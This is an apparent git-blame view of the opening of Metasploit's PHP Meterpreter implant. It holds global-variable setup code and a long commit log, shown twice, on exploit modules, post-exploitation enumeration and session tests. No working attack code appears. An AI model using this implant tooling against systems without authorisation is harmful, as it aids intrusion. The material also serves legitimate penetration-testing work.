2016-11-29 10:43:34 +01:00
|
|
|
/*<?php /**/
|
2010-06-08 09:59:36 +02:00
|
|
|
|
2010-07-27 23:16:15 +02:00
|
|
|
# Everything that needs to be global has to be made so explicitly so we can run
|
|
|
|
# inside a call to create_user_func($user_input);
|
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
# global list of channels
|
2010-06-24 00:38:01 +02:00
|
|
|
if (!isset($GLOBALS['channels'])) {
|
|
|
|
$GLOBALS['channels'] = array();
|
2010-06-23 22:00:27 +02:00
|
|
|
}
|
|
|
|
|
2011-01-10 09:04:17 +01:00
|
|
|
# global mapping of channels to channelized processes. This is how we know
|
|
|
|
# if we need to kill a process when it's channel has been closed.
|
|
|
|
if (!isset($GLOBALS['channel_process_map'])) {
|
|
|
|
$GLOBALS['channel_process_map'] = array();
|
|
|
|
}
|
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
# global resource map. This is how we know whether to use socket or stream
|
|
|
|
# functions on a channel.
|
2010-06-24 00:38:01 +02:00
|
|
|
if (!isset($GLOBALS['resource_type_map'])) {
|
|
|
|
$GLOBALS['resource_type_map'] = array();
|
2010-06-23 22:00:27 +02:00
|
|
|
}
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
# global map of sockets to the associated peer host.
|
|
|
|
if (!isset($GLOBALS['udp_host_map'])) {
|
|
|
|
$GLOBALS['udp_host_map'] = array();
|
|
|
|
}
|
|
|
|
|
2010-06-23 22:00:27 +02:00
|
|
|
# global list of resources we need to watch in the main select loop
|
2010-06-24 00:38:01 +02:00
|
|
|
if (!isset($GLOBALS['readers'])) {
|
|
|
|
$GLOBALS['readers'] = array();
|
|
|
|
}
|
2010-06-15 02:33:24 +02:00
|
|
|
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-16 01:00:02 +02:00
|
|
|
# global list of extension commands
|
|
|
|
if (!isset($GLOBALS['commands'])) {
|
2017-06-05 13:15:27 +02:00
|
|
|
$GLOBALS['commands'] = array("core_loadlib", "core_machine_id", "core_set_uuid",
|
|
|
|
"core_set_session_guid", "core_get_session_guid");
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
